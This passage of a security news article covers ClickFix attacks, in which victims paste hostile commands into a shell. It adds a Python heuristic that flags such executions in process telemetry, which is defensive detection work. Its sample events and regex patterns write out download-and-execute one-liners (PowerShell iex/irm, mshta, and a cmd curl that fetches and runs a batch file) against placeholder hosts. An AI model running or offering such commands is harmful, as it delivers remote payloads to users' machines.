
Researchers at Palo Alto Networks' Unit 42 threat intelligence division have also reported seeing more ClickFix attacks. In a July report, they said attackers lure victims into copying and pasting commands that supposedly apply quick fixes for common computer issues such as performance problems, missing drivers, or pop-up errors. Fake tech support forums are one way these attacks start. In other campaigns, threat actors have also used fake DocuSign and Okta single sign-on pages to trick users. Payloads include infostealers, remote access trojans (RATs), or tools that disable security controls.
“This delivery method bypasses many standard detection and prevention controls,” says the Palo Alto report. “There is no exploit, phishing attachment, or malicious link. Instead, potential victims unknowingly run the command themselves, through a trusted system shell. This method makes infections from ClickFix more complicated to detect than drive-by downloads or traditional malware droppers.”
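The Palo Alto quote above explains why ClickFix lands on endpoint process telemetry rather than on a mail gateway or URL filter: the only observable is a trusted shell being started by the user with a hostile command line. What follows is an added example (written for this page, not code from the article, Unit 42 or NCC Group) of the kind of heuristic a detection engineer would run over process-creation events. It scores a shell or script host launched with explorer.exe as its parent (the parent when a command is typed into the Win+R Run dialog) together with a download-and-execute primitive or window-hiding flags in the command line. The event records, hostnames, field names, weights and threshold are constructed assumptions, not real telemetry or a vendor rule.

```python
"""Heuristic triage of ClickFix-style executions from process-creation events.

Added example for this page; not a vendor detection rule. The events below are
constructed to resemble Sysmon Event ID 1 / EDR process-creation records.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Shells and script hosts that ClickFix lures typically ask the victim to paste into.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# explorer.exe is the parent when a command is entered in the Win+R Run dialog
# (or the File Explorer address bar), i.e. the user typed/pasted it, not a script.
USER_LAUNCH_PARENTS = {"explorer.exe"}

# Download-and-execute primitives commonly seen in pasted one-liners.
DOWNLOAD_EXEC = re.compile(
    r"(invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod|downloadstring|\bcurl\b|"
    r"bitsadmin|\biex\b|invoke-expression|mshta\s+https?://|"
    r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})",
    re.IGNORECASE,
)
# Flags that hide the console or suppress profile loading / prompts.
HIDE_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|/c\s", re.IGNORECASE)

THRESHOLD = 3  # assumed tuning value; calibrate against your own baseline


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    if basename(ev.image) in SHELLS and basename(ev.parent_image) in USER_LAUNCH_PARENTS:
        score += 2
        reasons.append("shell launched from user dialog (explorer.exe parent)")
    if DOWNLOAD_EXEC.search(ev.command_line):
        score += 2
        reasons.append("download-and-execute primitive in command line")
    if HIDE_WINDOW.search(ev.command_line):
        score += 1
        reasons.append("window-hiding / profile-suppression flags")
    return score, reasons


def is_clickfix_like(ev: ProcEvent, threshold: int = THRESHOLD) -> bool:
    return score_event(ev)[0] >= threshold


def triage(events: list[ProcEvent], threshold: int = THRESHOLD) -> list[tuple[int, int, list[str]]]:
    """Return (index, score, reasons) for every event at or above the threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (hostnames are .invalid placeholders, not real infrastructure).
SAMPLE_EVENTS = [
    # 0: classic ClickFix paste in Win+R: hidden window, fetch and eval a remote script
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              'powershell -w hidden -c "iex (irm https://check.example.invalid/verify.txt)"'),
    # 1: fake-CAPTCHA variant that points mshta at a remote HTA
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://check.example.invalid/captcha.hta"),
    # 2: benign: user simply opened a PowerShell console from the Start menu
    ProcEvent(r"C:\Windows\explorer.exe", PS, f'"{PS}"'),
    # 3: benign: scheduled admin script run from cmd.exe, no user dialog, no download
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS,
              r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    # 4: cmd.exe variant: curl a batch file to %TEMP% and run it
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd /c curl -s https://check.example.invalid/fix.bat -o %TEMP%\fix.bat && %TEMP%\fix.bat"),
]

if __name__ == "__main__":
    for idx, score, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score={score} {reasons}")
```

The explorer.exe parent alone is deliberately worth less than the threshold, because users legitimately open consoles; it is the combination with a remote fetch or a hidden window that makes the event worth a ticket. On a live host the same user-typed command is also written to the Win+R history in the registry under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, which is the artifact to pull during incident response when process telemetry is missing.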
In yet another instance, researchers at NCC Group today issued this report on a ClickFix attack they discovered in May. It involved a drive-by compromise and a fake CAPTCHA popup, with the goal of installing the Lumma C2 Stealer.
